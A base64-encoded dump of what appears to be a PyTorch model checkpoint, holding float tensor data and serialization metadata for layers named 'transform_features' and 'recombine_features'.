JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+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